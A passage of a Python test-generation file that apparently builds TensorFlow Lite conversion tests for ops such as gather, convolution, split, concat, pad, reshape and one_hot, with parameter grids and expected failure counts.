make_binary_op_tests(options, tf.pow, expected_tf_failures=7)
@register_make_test_function()
def make_floor_div_tests(options):
make_binary_op_tests(options, tf.floor_div)
@register_make_test_function()
def make_floor_mod_tests(options):
make_binary_op_tests(options, tf.floormod)
@register_make_test_function()
def make_squared_difference_tests(options):
make_binary_op_tests(options, tf.squared_difference)
@register_make_test_function()
def make_gather_tests(options):
"""Make a set of tests to do gather."""
test_parameters = [
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[10], [1, 2, 20]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[3], [5]],
"axis": [-1, 0, 1],
},
{
# TODO(b/123895910): add Nd support for strings.
"params_dtype": [tf.string],
"params_shape": [[8]],
"indices_dtype": [tf.int32],
"indices_shape": [[3]],
"axis": [0],
}
]
def build_graph(parameters):
"""Build the gather op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
indices = tf.placeholder(
dtype=parameters["indices_dtype"],
name="indices",
shape=parameters["indices_shape"])
axis = min(len(parameters["params_shape"]), parameters["axis"])
out = tf.gather(params, indices, axis=axis)
return [params, indices], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
indices = create_tensor_data(parameters["indices_dtype"],
parameters["indices_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, indices], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, indices])))
# Note that TF can't execute with index=1 and params_shape=[10].
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
@register_make_test_function()
def make_gather_nd_tests(options):
"""Make a set of tests to do gather_nd."""
test_parameters = [
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 1]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[1, 1]],
},
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 5]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[2, 1], [2, 2]],
},
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 5, 10]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[3, 1], [2, 2], [2, 3], [2, 1, 3]],
},
]
def build_graph(parameters):
"""Build the gather_nd op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
indices = tf.placeholder(
dtype=parameters["indices_dtype"],
name="indices",
shape=parameters["indices_shape"])
out = tf.gather_nd(params, indices)
return [params, indices], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
indices = create_tensor_data(parameters["indices_dtype"],
parameters["indices_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, indices], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, indices])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_gather_with_constant_tests(options):
"""Make a set of test which feed a constant to gather toco."""
test_parameters = [{
"input_shape": [[3]],
"reference_shape": [[2]],
}, {
"input_shape": [[2, 3]],
"reference_shape": [[2, 3]],
}]
def build_graph(parameters):
"""Build a graph where the inputs to Gather are constants."""
reference = tf.placeholder(
dtype=tf.int32, shape=parameters["reference_shape"])
gather_input = tf.constant(
create_tensor_data(tf.int32, parameters["input_shape"]))
gather_indices = tf.constant([0, 1], tf.int32)
out = tf.equal(reference, tf.gather(gather_input, gather_indices))
return [reference], [out]
def build_inputs(parameters, sess, inputs, outputs):
reference_values = np.zeros(parameters["reference_shape"], dtype=np.int32)
return [reference_values], sess.run(
outputs, feed_dict={inputs[0]: reference_values})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_embedding_lookup_tests(options):
"""Make a set of tests to do gather."""
test_parameters = [
{
"params_dtype": [tf.float32],
"params_shape": [[10], [10, 10]],
"ids_dtype": [tf.int32],
"ids_shape": [[3], [5]],
},
]
def build_graph(parameters):
"""Build the gather op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
ids = tf.placeholder(
dtype=parameters["ids_dtype"],
name="ids",
shape=parameters["ids_shape"])
out = tf.nn.embedding_lookup(params, ids)
return [params, ids], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
ids = create_tensor_data(parameters["ids_dtype"],
parameters["ids_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, ids], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, ids])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs)
@register_make_test_function()
def make_global_batch_norm_tests(options):
"""Make a set of tests to do batch_norm_with_global_normalization."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 1, 6, 2], [3, 4, 5, 4]],
"epsilon": [0.1, 0.0001],
"scale_after": [True, False],
}]
def build_graph(parameters):
"""Build the global batch norm testing graph."""
input_shape = parameters["input_shape"]
scale_shape = input_shape[3]
scale = create_tensor_data(parameters["dtype"], scale_shape)
offset = create_tensor_data(parameters["dtype"], scale_shape)
mean = create_tensor_data(parameters["dtype"], scale_shape)
variance = create_tensor_data(parameters["dtype"], scale_shape)
x = create_tensor_data(parameters["dtype"], parameters["input_shape"])
x_norm = tf.nn.batch_norm_with_global_normalization(
x, mean, variance, scale, offset,
parameters["epsilon"], parameters["scale_after"])
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.add(input_tensor, x_norm)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_fused_batch_norm_tests(options):
"""Make a set of tests to do fused_batch_norm."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 1, 6, 2]],
"epsilon": [0.001, 0.1],
}]
def build_graph(parameters):
"""Build the testing graph for fused batch normalization."""
input_shape = parameters["input_shape"]
scale_shape = input_shape[3]
scale = create_tensor_data(parameters["dtype"], scale_shape)
offset = create_tensor_data(parameters["dtype"], scale_shape)
mean = create_tensor_data(parameters["dtype"], scale_shape)
variance = create_tensor_data(parameters["dtype"], scale_shape)
x = create_tensor_data(parameters["dtype"], parameters["input_shape"])
[x_norm, _, _] = tf.nn.fused_batch_norm(
x, scale, offset, mean, variance,
parameters["epsilon"], data_format="NHWC", is_training=False)
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.add(input_tensor, x_norm)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_conv_tests(options):
"""Make a set of tests to do convolution."""
test_parameters = [{
"input_shape": [[1, 3, 4, 3], [4, 6, 6, 1]],
"filter_shape": [[1, 1], [2, 3], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 2, 3, 1]],
"dilations": [[1, 1, 1, 1], [1, 3, 2, 1], [1, 2, 2, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"], # TODO(aselle): NCHW would be good
"constant_filter": [True, False],
"channel_multiplier": [1, 2],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
# Get filter input either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
filter_input = create_tensor_data(np.float32, filter_shape)
input_tensors = [input_tensor]
else:
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
input_tensors = [input_tensor, filter_input]
out = tf.nn.conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, filter_shape))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=40)
# Note: This is a regression test for a bug (b/122651451) that Toco incorrectly
# erases the reduction indices array while it's shared with other ops.
@register_make_test_function()
def make_l2norm_shared_epsilon_tests(options):
"""Regression test for a bug (b/122651451)."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[5, 7]],
"dim": [1],
"epsilon": [1e-8],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
epsilon = tf.constant(parameters["epsilon"])
out1 = tf.nn.l2_normalize(input_tensor, parameters["dim"], epsilon=epsilon)
out2 = tf.nn.l2_normalize(input_tensor, parameters["dim"], epsilon=epsilon)
out = out1 + out2
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Note: This is a regression test for a bug (b/112436267) that Toco incorrectly
# fuses weights when multiple Conv2D/FULLY_CONNECTED ops share the same constant
# weight tensor.
@register_make_test_function()
def make_conv_with_shared_weights_tests(options):
"""Make a test where 2 Conv ops shared the same constant weight tensor."""
test_parameters = [{
"input_shape": [[1, 10, 10, 3]],
"filter_shape": [[3, 3]],
"strides": [[1, 1, 1, 1]],
"dilations": [[1, 1, 1, 1]],
"padding": ["SAME"],
"data_format": ["NHWC"],
"channel_multiplier": [1],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
input_tensors = [input_tensor]
# Construct a constant weights tensor which will be used by both Conv2D.
filter_tensor = tf.constant(
create_tensor_data(np.float32, filter_shape), dtype=tf.float32)
# Ensure that FuseBinaryIntoFollowingAffine works with an input which
# is shared by multiple affine ops.
conv_input = input_tensor + 0.1
# Construct 2 Conv2D operations which use exactly the same input and
# weights.
result1 = tf.nn.conv2d(
conv_input,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
result2 = tf.nn.conv2d(
conv_input,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
# Add MUL ops after Conv2D ops. These MUL ops should be fused into the
# weights of Conv2D.
result1 = result1 * 2
result2 = result2 * 3
# Add the 2 results up.
out = result1 + result2
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, unused_filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Note: This is a regression test for a bug (b/112303004) that Toco incorrectly
# transforms Conv into DepthwiseConv when two Conv ops share the same constant
# weight tensor.
@register_make_test_function()
def make_conv_to_depthwiseconv_with_shared_weights_tests(options):
"""Make a test where 2 Conv ops shared the same constant weight tensor."""
test_parameters = [{
"input_shape": [[1, 10, 10, 1]],
"filter_shape": [[3, 3]],
"strides": [[1, 1, 1, 1]],
"dilations": [[1, 1, 1, 1]],
"padding": ["SAME"],
"data_format": ["NHWC"],
"channel_multiplier": [3],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
# Construct a constant weights tensor which will be used by both Conv2D.
filter_tensor = tf.constant(
create_tensor_data(np.float32, filter_shape), dtype=tf.float32)
input_tensors = [input_tensor]
# Construct 2 Conv2D operations which use exactly the same input and
# weights.
result1 = tf.nn.conv2d(
input_tensor,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
result2 = tf.nn.conv2d(
input_tensor,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
# Add the 2 results up.
out = result1 + result2
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, unused_filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_depthwiseconv_tests(options):
"""Make a set of tests to do convolution."""
# Tensorflow only supports equal strides
test_parameters = [
{
"input_shape": [[1, 3, 4, 3], [1, 10, 10, 3]],
"filter_size": [[1, 1], [1, 2], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 3, 3, 1]],
"dilations": [[1, 1, 1, 1], [1, 3, 2, 1], [1, 2, 2, 1]],
"channel_multiplier": [1, 2],
"rate": [[1, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"],
"constant_filter": [True, False],
},
{
"input_shape": [[1, 3, 4, 3]],
"filter_size": [[1, 1]],
"strides": [[1, 1, 2, 1]], # TF needs [1, x, x, 1]
"dilations": [[1, 1, 1, 1], [1, 2, 2, 1]],
"channel_multiplier": [2],
"rate": [[2, 2]], # Only [1, 1] is supported
"padding": ["SAME"],
"data_format": ["NHWC"],
"constant_filter": [True, False],
}
]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_size"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a depthwise conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
# Get filter input either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
filter_input = create_tensor_data(np.float32, filter_shape)
input_tensors = [input_tensor]
else:
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
input_tensors = [input_tensor, filter_input]
out = tf.nn.depthwise_conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
rate=parameters["rate"],
padding=parameters["padding"],
data_format=parameters["data_format"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, filter_shape))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=4)
@register_make_test_function()
def make_split_tests(options):
"""Make a set of tests to do tf.split."""
test_parameters = [{
"input_shape": [[1, 3, 4, 6], [2, 4, 1], [6, 4], [8]],
"num_or_size_splits": [1, 2, 3, 4, 5],
"axis": [0, 1, 2, 3, -4, -3, -2, -1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.split(
input_tensor, parameters["num_or_size_splits"], parameters["axis"])
return [input_tensor], [out[0]]
def build_inputs(parameters, sess, inputs, outputs):
values = [create_tensor_data(np.float32, parameters["input_shape"])]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=112)
@register_make_test_function()
def make_splitv_tests(options):
"""Make a set of tests to do tf.split_v."""
test_parameters = [{
"input_shape": [[1, 3, 4, 6], [2, 4, 1], [6, 4], [8]],
"size_splits": [[2, 2], [1, 3], [4, 2], [5, 3],
[-1, 1], [-1, 2], [-1, 4]],
"axis": [0, 1, 2, 3, -4, -3, -2, -1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.split(input_tensor, parameters["size_splits"], parameters["axis"])
return [input_tensor], [out[0]]
def build_inputs(parameters, sess, inputs, outputs):
values = [create_tensor_data(np.float32, parameters["input_shape"])]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=158)
@register_make_test_function()
def make_concat_tests(options):
"""Make a set of tests to do concatenation."""
test_parameters = [{
"base_shape": [[1, 3, 4, 3], [3, 4]],
"num_tensors": [1, 2, 3, 4, 5, 6],
"axis": [0, 1, 2, 3, -3, -2, -1],
"type": [tf.float32, tf.uint8, tf.int32, tf.int64],
}]
def get_shape(parameters, delta):
"""Return a tweaked version of 'base_shape'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
if axis < 0:
axis += len(shape)
if axis < len(shape):
shape[axis] += delta
return shape
def build_graph(parameters):
all_tensors = []
for n in range(0, parameters["num_tensors"]):
input_tensor = tf.placeholder(dtype=parameters["type"],
name=("input%d" % n),
shape=get_shape(parameters, n))
all_tensors.append(input_tensor)
out = tf.concat(all_tensors, parameters["axis"])
return all_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
all_values = []
for n in range(0, parameters["num_tensors"]):
input_values = create_tensor_data(
parameters["type"], get_shape(parameters, n))
all_values.append(input_values)
return all_values, sess.run(
outputs, feed_dict=dict(zip(inputs, all_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=60)
@register_make_test_function()
def make_fully_connected_tests(options):
"""Make a set of tests to do fully_connected."""
test_parameters = [{
"shape1": [[3, 3]],
"shape2": [[3, 3]],
"transpose_a": [True, False],
"transpose_b": [True, False],
"constant_filter": [True, False],
}, {
"shape1": [[4, 4], [1, 4], [4]],
"shape2": [[4, 4], [4, 1], [4]],
"transpose_a": [False],
"transpose_b": [False],
"constant_filter": [True, False],
}, {
"shape1": [[40, 37]],
"shape2": [[37, 40]],
"transpose_a": [False],
"transpose_b": [False],
"constant_filter": [True, False],
}, {
"shape1": [[40, 37]],
"shape2": [[40, 37]],
"transpose_a": [False],
"transpose_b": [True],
"constant_filter": [True, False],
}]
def build_graph(parameters):
"""Build a matmul graph given `parameters`."""
input_tensor1 = tf.placeholder(dtype=tf.float32, name="input1",
shape=parameters["shape1"])
# Get input_tensor2 either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
input_tensor2 = create_tensor_data(np.float32, parameters["shape2"])
input_tensors = [input_tensor1]
else:
input_tensor2 = tf.placeholder(
dtype=tf.float32, name="input2", shape=parameters["shape2"])
input_tensors = [input_tensor1, input_tensor2]
out = tf.matmul(input_tensor1, input_tensor2,
transpose_a=parameters["transpose_a"],
transpose_b=parameters["transpose_b"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input_values1) or 2
# tensors (input_values1, input_values2) based on whether the second input
# is a constant or variable input.
values = [create_tensor_data(np.float32, shape=parameters["shape1"])]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, parameters["shape2"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=10)
@register_make_test_function()
def make_l2norm_tests(options):
"""Make a set of tests to do l2norm."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[5, 7], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
"dim": [0, 1, 2, 3, [2, 3], -2],
"epsilon": [None, 1e-12, 1e-3],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
if parameters["epsilon"]:
out = tf.nn.l2_normalize(
input_tensor, parameters["dim"], epsilon=parameters["epsilon"])
else:
out = tf.nn.l2_normalize(input_tensor, parameters["dim"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=9)
@register_make_test_function()
def make_local_response_norm_tests(options):
"""Make a set of tests to do local_response_norm."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3]],
"depth_radius": [None, 0, 1, 3, 5],
"bias": [None, 0.3, -0.1],
"alpha": [None, 2, -3],
"beta": [None, 0.25, 2],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.local_response_normalization(
input_tensor, depth_radius=parameters["depth_radius"],
bias=parameters["bias"], alpha=parameters["alpha"],
beta=parameters["beta"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_pad_tests(options):
"""Make a set of tests to do pad."""
# TODO(nupurgarg): Add test for tf.uint8.
test_parameters = [
# 4D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 1, 2, 1], [2, 1, 1, 1]],
"paddings": [[[0, 0], [0, 1], [2, 3], [0, 0]], [[0, 1], [0, 0],
[0, 0], [2, 3]]],
"constant_paddings": [True, False],
},
# 2D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2]],
"paddings": [[[0, 1], [2, 3]]],
"constant_paddings": [True, False],
},
# 1D:
{
"dtype": [tf.int32],
"input_shape": [[1]],
"paddings": [[[1, 2]]],
"constant_paddings": [False],
},
]
def build_graph(parameters):
"""Build a pad graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
# Get paddings as either a placeholder or constants.
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="padding", shape=shape)
input_tensors = [input_tensor, paddings]
out = tf.pad(input_tensor, paddings=paddings)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_padv2_tests(options):
"""Make a set of tests to do padv2."""
# TODO(nupurgarg): Add test for tf.uint8.
test_parameters = [
# 4D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 1, 2, 1], [2, 1, 1, 1]],
"paddings": [[[0, 0], [0, 1], [2, 3], [0, 0]], [[0, 1], [0, 0],
[0, 0], [2, 3]]],
"constant_paddings": [True, False],
"constant_values": [0, 2],
},
# 2D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2]],
"paddings": [[[0, 1], [2, 3]]],
"constant_paddings": [True, False],
"constant_values": [0, 2],
},
# 1D:
{
"dtype": [tf.int32],
"input_shape": [[1]],
"paddings": [[[0, 1]]],
"constant_paddings": [False],
"constant_values": [0, 2],
},
]
def build_graph(parameters):
"""Build a pad graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
# Get paddings as either a placeholder or constants.
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="padding", shape=shape)
input_tensors = [input_tensor, paddings]
out = tf.pad(input_tensor, paddings=paddings,
constant_values=parameters["constant_values"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reshape_tests(options):
"""Make a set of tests to do reshape."""
# All shapes below are suitable for tensors with 420 elements.
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[3, 4, 5, 7], [4, 105], [21, 5, 2, 2], [420]],
"output_shape": [[15, 28], [420], [1, -1, 5, 7], [-1]],
"constant_shape": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1]],
"output_shape": [[]],
"constant_shape": [True, False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
# Get shape as either a placeholder or constants.
if parameters["constant_shape"]:
output_shape = parameters["output_shape"]
input_tensors = [input_tensor]
else:
# The shape of the shape tensor.
shape_tensor_shape = [len(parameters["output_shape"])]
output_shape = tf.placeholder(
dtype=tf.int32, name="output_shape", shape=shape_tensor_shape)
input_tensors = [input_tensor, output_shape]
out = tf.reshape(input_tensor, shape=output_shape)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_shape"]:
values.append(np.array(parameters["output_shape"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_shape_tests(options):
"""Make a set of tests to do shape."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [0], [1, 1, 1, 3], [2, 3, 4, 5], [5, 5], [10]],
"out_type": [tf.int32, tf.int64],
}]
def build_graph(parameters):
"""Build the shape op testing graph."""
# Note that we intentionally leave out the shape from the input placeholder
# to prevent the Shape operation from being optimized out during conversion.
input_value = tf.placeholder(dtype=parameters["input_dtype"], name="input")
out = tf.shape(input_value, out_type=parameters["out_type"])
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_rank_tests(options):
"""Make a set of tests to do rank."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [0], [1, 1, 1, 3], [2, 3, 4, 5], [5, 5], [10]],
}]
def build_graph(parameters):
"""Build the rank op testing graph."""
input_value = tf.placeholder(dtype=parameters["input_dtype"], name="input")
out = tf.rank(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_one_hot_tests(options):
"""Make a set of tests to do one_hot."""
test_parameters = [{
"indices_type": [tf.int32, tf.int64],
"indices_shape": [[3], [4, 4], [1, 5], [5, 1]],
"axis": [0, 1],
"dtype": [tf.int32, tf.int64, tf.float32],
"provide_optional_inputs": [True, False],
}]
def build_graph(parameters):
indices = tf.placeholder(
dtype=parameters["indices_type"],
name="indices",
shape=parameters["indices_shape"])
depth = tf.placeholder(dtype=tf.int32, name="depth", shape=())
if not parameters["provide_optional_inputs"]:
out = tf.one_hot(indices=indices, depth=depth)
return [indices, depth], [out]
on_value = tf.placeholder(
dtype=parameters["dtype"], name="on_value", shape=())
off_value = tf.placeholder(
dtype=parameters["dtype"], name="off_value", shape=())
out = tf.one_hot(
indices=indices,
depth=depth,
on_value=on_value,
off_value=off_value,
axis=parameters["axis"],
dtype=parameters["dtype"])
return [indices, depth, on_value, off_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = [
create_tensor_data(
parameters["indices_type"],
shape=parameters["indices_shape"],
min_value=-1,
max_value=10),
create_tensor_data(tf.int32, shape=None, min_value=1, max_value=10),
]
if parameters["provide_optional_inputs"]:
input_values.append(
create_tensor_data(
parameters["dtype"], shape=None, min_value=1, max_value=10))
input_values.append(
create_tensor_data(
